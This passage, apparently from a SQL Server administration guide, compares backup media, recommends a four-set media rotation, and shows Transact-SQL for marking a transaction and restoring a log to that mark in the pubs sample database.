  • Tape jukeboxes Tape jukeboxes are similar to autoloader tape systems. Jukeboxes use magnetic optical disks rather than DAT tapes to offer high- capacity solutions for the enterprise. These systems load and unload disks stored internally for backup and recovery operations. The key drawback to tape jukeboxes is the high cost.
  • Removable disks Removable disks, such as Iomega Jaz, are increasingly being used as backup devices. Removable disks offer good speed and ease of use for a single drive or single system backup. However, the disk drives and the removable disks tend to be more expensive than standard tape or DAT drive solutions.
  • Disk drives Disk drives provide the fastest way to back up and restore databases. With disk drives, you can often accomplish in minutes what a tape drive takes hours to do. When your needs mandate a speedy recovery, nothing beats a disk drive. The drawbacks to disk drives, however, are high cost and low extensibility.
    Although backup device selection is an important step in implementing a backup and recovery plan, it isn't the only step. You also need to purchase the tapes or the disks, or both, that will allow you to implement your backup and recovery plan. The number of tapes, disks, or drives you need depends on

  • How much data you'll be backing up
  • How often you'll be backing up the data
  • How long you'll need to keep additional data sets
    The typical way to implement backups is to use a rotation schedule whereby you rotate through two or more sets of tapes, disks, or files. The idea is that you can increase media longevity by reducing media usage and, at the same time, reduce the number of actual tapes, disks, or files you need to ensure that you have data on hand when necessary.
    Best Practice For important databases, I recommend using four media sets. Use two sets for regular rotations. Use the third set for the first rotation cycle at the beginning of each month. Use the fourth set for the first rotation cycle of each quarter. This technique allows you to recover the database in a wide variety of situations.
    Using Backup Strategies
    The backup strategies you choose are based on the type of database as well as the type of data. Two key things to keep in mind when planning a backup strategy are the following:
  • The master database stores important information about the structure of other databases, including the database size. Any time database information or structure changes, master can get updated without your knowing about it. For example, the size of most databases changes automatically, and when this happens master is updated. Because of this, often the best backup strategy for master is to schedule backups every other day and to rotate through several backup sets so that you can go back to several different versions of master if necessary.
  • You can use transaction logs to recover databases up to the point of failure and up to a point of work. To recover to a point of work you must insert named log marks into the transaction log using BEGIN TRANSACTION WITH MARK. You can then recover to a mark in the log using RESTORE LOG WITH STOPATMARK or RESTORE LOG WITH STOPBEFOREMARK.
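    Sketched in Transact-SQL against the pubs sample database, marking a point of work and later recovering to it might look like this (backup paths are hypothetical):

-- Mark the log at a known point of work
BEGIN TRANSACTION RoyaltyUpdate WITH MARK 'Update royalty rates'
UPDATE roysched SET royalty = royalty * 1.10
COMMIT TRANSACTION RoyaltyUpdate

-- Recovery: restore the last full backup, then stop the log restore at the mark
RESTORE DATABASE pubs FROM DISK = 'D:\Backup\pubs_full.bak' WITH NORECOVERY
RESTORE LOG pubs FROM DISK = 'D:\Backup\pubs_log.bak'
WITH STOPATMARK = 'RoyaltyUpdate', RECOVERY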